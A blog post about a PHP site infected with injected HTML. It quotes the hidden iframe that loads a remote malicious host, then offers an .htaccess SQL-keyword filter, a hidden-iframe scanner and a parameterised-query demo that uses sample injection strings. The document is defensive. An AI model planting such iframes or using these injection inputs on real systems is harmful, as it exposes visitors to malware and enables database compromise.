in Scripting, Security

HTML Injection

Yesterday I got a message from Google about my AdWords account having been suspended, the reason being a suspected malware infection on my site. I then checked my site's code and realised that yes, I had been compromised: the code below had somehow been added to my PHP files:

<div style="display:none"><iframe width=415 height=797 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none">

From the above, it seems this loads a page in the background within an iframe without the user's consent; I don't even want to know what happens when you load that URL. Anyway, for those of you who might find yourselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

# Answer 403 Forbidden to any request whose raw query string contains a quote, bracket,
# semicolon or URL-encoded control character followed (anywhere later) by an SQL keyword.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
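To see what the rule above actually does before relying on it, here is an added example (not code from the original post) that ports the RewriteCond pattern to a Python regex and runs it over a few constructed query strings. Apache tests the rule against the raw, still URL-encoded query string, which is why "%27" sits in the pattern next to "'".

```python
"""Try the .htaccess query-string filter above against sample requests.

Added example, not code from the original post: the RewriteCond pattern
is ported to a Python regex so its behaviour can be checked before it is
deployed. The sample query strings are constructed for the demonstration.
"""
import re

# The RewriteCond pattern verbatim; the [NC] flag becomes re.IGNORECASE.
# The rule needs BOTH a special character (left group) AND, somewhere
# after it, an SQL keyword (right group) before it fires.
FILTER = re.compile(
    r"^.*(;|<|>|'|\"|\)|%0A|%0D|%22|%27|%3C|%3E|%00)"
    r".*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).*",
    re.IGNORECASE,
)


def blocked(query_string):
    """True if the RewriteRule's [F] flag would answer this request with 403."""
    return FILTER.match(query_string) is not None


def classify(query_strings):
    """Map each query string to 'blocked' or 'allowed' for a quick review."""
    return {qs: ("blocked" if blocked(qs) else "allowed") for qs in query_strings}


# Constructed samples: two ordinary requests, two that the rule is meant to
# stop, and one legitimate request that the rule rejects as collateral damage.
SAMPLES = [
    "id=5",                          # plain numeric parameter
    "q=how+to+select+a+laptop",      # keyword alone, no special character
    "id=1'%20union%20select%201",    # quote followed by SQL keywords
    "page=%27%3Bdrop%20table",       # same, with URL-encoded punctuation
    "name=O'Brien&action=update",    # false positive: apostrophe then "update"
]

if __name__ == "__main__":
    for qs, verdict in classify(SAMPLES).items():
        print("%-32s %s" % (qs, verdict))
```

Two things the run makes visible: the filter only looks at the query string of new requests, so it does nothing about markup that is already sitting in the PHP files, and it rejects legitimate input such as a surname with an apostrophe whenever an SQL keyword happens to follow it.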

Some people are suggesting playing around with mod_rewrite, but I'm not too sure that's the safest way to deal with it. One question remains: how was the HTML injected in the first place?
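Whatever the root cause turns out to be, the first defensive step is to know exactly which files carry the injected markup. The following is an added example (not code from the original post): a read-only scanner that walks a web root and reports every iframe sitting inside a display:none div, with file, line and target URL. The web root, file contents and hostnames are constructed for the demonstration.

```python
"""Find every file that carries the hidden-iframe injection shown above.

Added example, not code from the original post. The sample files and
URLs are constructed; the scanner never modifies anything.
"""
import re
import tempfile
from pathlib import Path

# <div ... display:none ...> immediately followed by <iframe ... src=...>.
# Quotes around src are optional so unquoted or minified variants still match.
HIDDEN_IFRAME = re.compile(
    r"<div\b[^>]*display\s*:\s*none[^>]*>\s*"
    r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?(?P<src>[^\"'\s>]+)",
    re.IGNORECASE,
)


def find_hidden_iframes(text):
    """Return [(line_number, src), ...] for each hidden iframe in the text."""
    return [(text.count("\n", 0, m.start()) + 1, m.group("src"))
            for m in HIDDEN_IFRAME.finditer(text)]


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map each affected file (path relative to root) to its list of hits."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed samples: an injected PHP file in the same shape as the one in
# the post (placeholder host), and a clean page with a visible, legitimate iframe.
INFECTED = ('<?php include "header.php"; ?>\n'
            '<div style="display:none"><iframe width=415 height=797 '
            'src="http://malicious.example:8080/index.php" ></iframe></div>\n')
CLEAN = ('<div class="video">\n'
         '<iframe src="https://video.example/embed/42"></iframe>\n</div>\n')


def demo_scan():
    """Build a throwaway web root with both samples and scan it."""
    with tempfile.TemporaryDirectory() as webroot:
        (Path(webroot) / "index.php").write_text(INFECTED)
        (Path(webroot) / "about.html").write_text(CLEAN)
        return scan_tree(webroot)


if __name__ == "__main__":
    for path, hits in demo_scan().items():
        for line, src in hits:
            print("%s:%d hidden iframe -> %s" % (path, line, src))
```

Run it against the real document root before and after cleanup; an empty report after the fix, combined with fresh file timestamps and a comparison against a known-good backup, is better evidence than the absence of warnings from Google.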

  • Bava

    If your website is infected, cleaning it manually would be really difficult for large websites. Here is one site that gives detailed technical information and some automated removal procedure as well:

    http://paramprojects.com/website/badwarefaq

  • Tk

    Usually by inserting code that tricks your PHP into 'including' a foreign file (if the http wrapper is enabled), either that or SQL injection, which happens when you do not properly escape all HTTP vars (I see your .htaccess rule blocks SQL statements). The alternative to escaping HTTP vars is to use parametric SQL statements with the new mssqli/mysqli API.
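The parameterised approach Tk describes, shown side by side with the string-built query it replaces, as an added example that is not the commenter's code. Python's sqlite3 module stands in for the mysqli API (whose equivalent is prepare() followed by bind_param()), and the user table is built in memory for the demonstration.

```python
"""Parameterised query versus string-built query.

Added example, not the commenter's code: sqlite3 stands in for mysqli and
the two-row user table is constructed in memory. A bound parameter is
never parsed as SQL, so no escaping of HTTP variables is needed and an
apostrophe in a name is just a character.
"""
import sqlite3


def make_db():
    """Constructed two-row user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return db


def lookup_vulnerable(db, name):
    """Pastes the HTTP variable into the SQL text: the value is parsed as SQL."""
    sql = "SELECT email FROM users WHERE name = '%s'" % name
    return [row[0] for row in db.execute(sql)]


def lookup_parameterised(db, name):
    """Sends the value separately from the statement: it is only ever data."""
    rows = db.execute("SELECT email FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def compare(name):
    """Run both lookups on a fresh table; returns (vulnerable, parameterised)."""
    db = make_db()
    try:
        vulnerable = lookup_vulnerable(db, name)
    except sqlite3.OperationalError as err:
        vulnerable = "SQL error: %s" % err
    return vulnerable, lookup_parameterised(db, name)


if __name__ == "__main__":
    for name in ("alice", "O'Brien", "x' OR '1'='1"):
        print("%-14r vulnerable=%r parameterised=%r" % ((name,) + compare(name)))
```

The second name breaks the string-built query with a syntax error, and the third turns a one-user lookup into a dump of every row; the parameterised version treats both as names that simply do not exist in the table.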